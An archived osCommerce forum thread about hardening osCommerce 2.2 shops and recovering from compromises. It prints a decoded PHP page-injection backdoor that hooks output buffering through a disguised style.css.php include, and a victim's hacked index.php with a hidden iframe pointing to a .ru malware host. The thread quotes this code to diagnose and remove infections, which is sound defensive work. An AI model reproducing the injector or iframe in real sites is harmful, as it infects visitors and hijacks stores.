Jump to content
Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

spooks

How to secure your osCommerce 2.2 site.

Recommended Posts

My last post here shows how to prevent this, see http://forums.oscommerce.com/index.php?sho...c=344272&hl= for details on this nasty hack, I hope u have a site backup!!

 

Decodes to:

 

 if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php')){include_once('/home4/shopfou3/public_html/catalog/admin/includes/languages/english/modules/index/_vti_cnf/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Thanks Sam. I have one, unfortunately it may be out of date so I don't want to move it over. Right now I am going through the files 1 by 1 and removing the code. Now I just need to figure out which an where the files are that it put on that need to be deleted. Guess I need to delete the filename php to preven this from happening again.

Share this post


Link to post
Share on other sites
Guess I need to delete the filename php to preven this from happening again.

 

Its file_manager.php that u must delete !!! :huh:


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Hi,

 

I have installed several of the security settings that has been recomended in this topic to my shop, I also belived that I had done enough testing but when addin a new product (something I had not tested), the product infomation link (to an external page) woun't work. when pushing on the link to "product information" you get redirected to the index page.

Anyone who have an idè on how to solve this?

All help really appriciated.

 

The security settings I have implemented is:

 

Folders

Security pro

Renaming admin

IP trap

.htaccess

 

Brg

Espen

Share this post


Link to post
Share on other sites
I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

 

I tried out your script, nice try but i feel personally it is too confusing for the newer users who will be lead to believe that they have a have when none exists.

Too many warnings about eval, perhaps you should add a list of files known to use this?

Good work though

Nic


Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Share this post


Link to post
Share on other sites

There is a list of files known to use eval - they're files from the default installation. See line 29 in admin/syscheck.php and add what you need.


Contributions: Better Together and Quantity Discounts, for osCommerce 2.2, 2.3.x and 3.0. See my profile for more details.

Share this post


Link to post
Share on other sites
I have added a mod that automates some common checks and looks for hacks on your site - it's at http://addons.oscommerce.com/info/7026

 

 

In your instruction, you made this statement:

 

Try this in a test environment prior to installing it on a live shop.

 

I have seen orther mod suggest the same thing. So am asking, how is this done, do we need to contact our host to have this done?

 

Thanks.

 

Bennett

Share this post


Link to post
Share on other sites
test environment, how is this done, do we need to contact our host to have this done?

 

 

It simply means set up a duplicate site eleswhere purly for testing, it can be with a seperate domain, or, most simply, within a subdirectory of your site, then it can share the same dbase if u want.

 

If installing within a subdirectory do not run the installer, as that will delete your existing dbase, just copy files & set up configure.php, filenames.php etc files manually.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Hi All,

 

I find it strange that no one has experienced the same problem as me when coming to being redirected to index page when clicking on the "more product information" link.... guess I just tweeked the security settings to hard....

 

But if anyone has an idè on how to solve it I'll listen :)

 

Cheers

Espen

 

This is what I have done:

 

I have installed several of the security settings that has been recomended in this topic to my shop, I also belived that I had done enough testing but when addin a new product (something I had not tested), the product infomation link (to an external page) woun't work. when pushing on the link to "product information" you get redirected to the index page.

Anyone who have an idè on how to solve this?

All help really appriciated.

 

The security settings I have implemented is:

 

Folders

Security pro

Renaming admin

IP trap

.htaccess

Share this post


Link to post
Share on other sites

Your error is not related to security, & likely nothing to do with any of the contribs u added.

 

Likely u created a cooinsidental error, your error is typical of many badly coded termplates.

 

Create a new thread with error & code plus link to faulty page.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

I just install eoCommerce 2.2 RC2 and every thing look good. I'm very new at this. I read yourpost here, about securing your site. Although this tells me WHAT I need to do, I'm not sure HOW to do it. With my host (Just Host) know how to go into File Manager and see may folders and files, but I don't have a clue on where to start to implement the security measure(s) in the link I cite above.

 

Can some one tell me HOW (what coding do I need to add or modify) and in WHICH files do I need to add or modify coding. How do I access these files. Do I need to implement ALL of the security measures at the link above? Please give me as much detail as you can for each question. I really appreciate your help.

Share this post


Link to post
Share on other sites
Your error is not related to security, & likely nothing to do with any of the contribs u added.

 

Likely u created a cooinsidental error, your error is typical of many badly coded termplates.

 

Create a new thread with error & code plus link to faulty page.

 

Thanks for the feedback. I will post a new tread with link etc. The only thing I have done besides adding the security settings is a Norwegian language pack and added payment module. Could it be the Norwegian language pack then???

I was so sure that it had something to do with the security settings...

 

Cheers

Espen

Share this post


Link to post
Share on other sites

 

They are all contributions, you just follow the instructions!!

 

How do I install a contribution http://forums.oscommerce.com/index.php?sho...=0#entry1432157


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Sam, you´re doing a GREAT JOB, but-Oh, boy, this is going to be quite of an afternoon-I can sence all this like a "yor site will be bulletproof but will cease to run" kind of thing. I´m expecting tones of "Fatal errors", blank pages...you name it. Hope not.

 

Can you, please, tell any posible conflicts- with PayPal for exemple.

 

Thanks!

Share this post


Link to post
Share on other sites
any posible conflicts

 

There should be no conflicts with most, refer to relevent support threads for each.

 

Some, like security pro, have inbuilt measures to avoid conflicts. :)


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Sorry if this is OT.

 

Is yacybot a bonafide spider?

 

Got three http errors in a row from different ips. Eg below

Site: http://xxxxx

Error Code: 400 - The request could not be understood by the server due to malformed syntax.

Occurred: 10/11/2009 1:12:40

Requested URL: http://xxxxxx/mod_ssl:error:HTTP-request

User Address: xxx.xx.xx.xx

User Agent: yacybot (amd64 Linux 2.6.28-15-generic; java 1.6.0_0; Europe/en) http://yacy.net/bot.html

Referer: http://xxxxx:443/


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

Share this post


Link to post
Share on other sites

Is yacybot a bonafide spider?

 

Does this help? yacy.net/bot.html


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Please help identify hack. This morning my osc site had an error on the main index page

Parse error: syntax error, unexpected $end in /data/13/1/102/19/1265997/user/1350825/htdocs/msrparts_com/sfmparts/index.php on line 384

 

When I FTP into the site I see that a new index.php had been replaced this weekend. I am theoretically the only one with access to the osc site or the ftp site. Can anybody give me insight as to how this may have happened and if there is a way to find out when, how, or where from this file came.

 

I am assuming that the filemanager may be an issue as discussed in this thread and am making attempts to put in place the suggested security measures.

 

Thank you.

Share this post


Link to post
Share on other sites

Please help identify hack. This morning my osc site had an error on the main index page

Parse error: syntax error.....

 

 

Its impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!!

 

If u find new code on the page that has led to this, posting that alien code would be more useful.

 

Apply all security advised & throughly check your site. Of course making backups as well, if not already done, is essential. wink.gif


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Its impossible to say if this is a hack or not, you have a syntax error, common problem, maybe u made a change in error!!

 

If u find new code on the page that has led to this, posting that alien code would be more useful.

 

Apply all security advised & throughly check your site. Of course making backups as well, if not already done, is essential. wink.gif

 

Thank you Sam. Part of my concern is that I have not worked on this site in several weeks and the index.php file that was on the server was updated or uploaded October 10. That is why i am trying to figure out how this could have happened.

I compared the file that was uploaded with the one that I uploaded on 09/23 The only difference is on Line 55 the original 09/23 reads:

</head>

<body>

<!-- header //-->

<?php $tab_sel = 2; ?>

<?php require(DIR_WS_INCLUDES . 'header.php'); ?>

<!-- header_eof //-->

and the one from 10/10

</head>

<body><div style="display:none">imoobdtmglzyfqfzsftbgwbpkcgwnef<iframe width=274 height=708 src="http : // your-bio . ru : 8080 / index.php" ></iframe></div>

<!-- header //-->

<?php $tab_sel = 2; ?>

<?php require(DIR_WS_INCLUDES . 'header.php'); ?>

<!-- header_eof //-->

 

Also in the 10/10 version of index.php the last lines of the code have been deleted. from <!-- right_navigation //--> on is no longer there.

 

</td>

<td class="<?php echo BOX_WIDTH_TD_RIGHT; ?>"><table border="0" class="<?php echo BOX_WIDTH_RIGHT; ?>" cellspacing="0" cellpadding="0">

<!-- right_navigation //-->

<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>

<!-- right_navigation_eof //-->

</table>

</td>

</tr>

</table>

 

 

 

</td>

<?php

}

?>

</tr>

</table>

<!-- body_eof //-->

 

<!-- footer //-->

<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>

<!-- footer_eof //-->

</body>

</html>

<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

 

Thank you in advance for your assistance. And please excuse my amateur knowledge.

Share this post


Link to post
Share on other sites

<iframe > http: // your - bio. ru: 8080 / index . php

 

 

Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes.

 

I can't find to much on the hack in question, other than google reports that the target contains viri, fortunatly the error caused means no-one will have seen the page.

 

Check all your files & look for added ones, esp in images folder

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

 

Its likely many files effected, you may also have hidden files added that u cant remove, best get host to wipe site & restore with your backup, then add security.

 

Also note the better hosts keep daily backups, some don't charge for a restore either.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Any time you see <iframe > on your site you can be fairly sure you've been hacked, osC does not use iframes.

 

I can't find to much on the hack in question, other than google reports that the target contains viri, fortunatly the error caused means no-one will have seen the page.

 

Check all your files & look for added ones, esp in images folder

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

 

Its likely many files effected, you may also have hidden files added that u cant remove, best get host to wipe site & restore with your backup, then add security.

 

Also note the better hosts keep daily backups, some don't charge for a restore either.

 

Thank you very much for your help. I am getting my files restored right now. I believed that this was the problem. In your opinion was this done through the file manager vulnerability you discussed?

 

Thanks again

Share this post


Link to post
Share on other sites

Does this help? yacy.net/bot.html

Yeah read that before I posted. It says it is a robot and obeys robots.txt, but if it did it would not get the http://xxxxxx/mod_ss...or:HTTP-request error.

 

Anyway, it doen't matter. I stopped in htaccess.


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

Share this post


Link to post
Share on other sites

×